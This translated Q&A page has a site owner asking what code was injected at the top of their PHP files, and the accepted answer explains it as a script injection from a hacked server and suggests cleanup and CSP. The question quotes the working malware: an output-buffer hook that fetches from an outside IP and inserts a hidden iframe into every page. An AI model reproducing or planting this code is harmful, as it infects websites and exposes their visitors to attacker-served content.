服務器黑客-隨機代碼添加到PHP文件的頂部
[英]Server Hack - Random Code added tot he top of PHP files
問題描述
我在我的一些.PHP頁面上找到了這些代碼行。
<?php /*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='http://82.200.204.151/config.inc.php' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->(.*?)<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->/i', '', $asd); $sdf = file_get_contents('http://82.200.204.151/config.inc.php');return str_replace('</body>', str_replace('http://82.200.204.151/config.inc.php', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/ ?>
有人知道嗎?
或者至少告訴我它在做什么...
1 個解決方案
解決方案1
6 已采納 2013-10-22 15:07:52
更新09/11/11
這稱為JavaScript注入( XSS 1 ),它在服務器被黑客入侵並傳播感染時發生。
例如,這可能會在進入網站時提示下載窗口,從而導致誤導用戶在其計算機上下載可能的惡意軟件。
要擺脫它,您最好檢查一下所有文件,掃描整台PC,或者進行全新安裝。 文件中通常包含奇怪的<script>標記,其中包含一些非常怪異的“ make -no-sense ” JS-這很好地表明您的文件已注入JS。
如果要永久消除泄漏 (或者直到他們找到XSS站點的新方法),還需要找到泄漏。
您可以做另一件事來保護自己免受XSS攻擊: CSP
1 ::跨站點腳本
無關:
自從我今天重新審視這個答案以來,在2001年9/11之后的14年,我要向那天死亡的人表示敬意-RIP
如何修復隨機 php 代碼預置在服務器中的每個 php 文件上
[英]How to fix Random php code is prepended on each php file in the server
如果我在代碼頂部添加了location.href腳本條件,PHP代碼將運行嗎?
[英]Will the php code run if I added a location.href script condition on the top of the code?
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.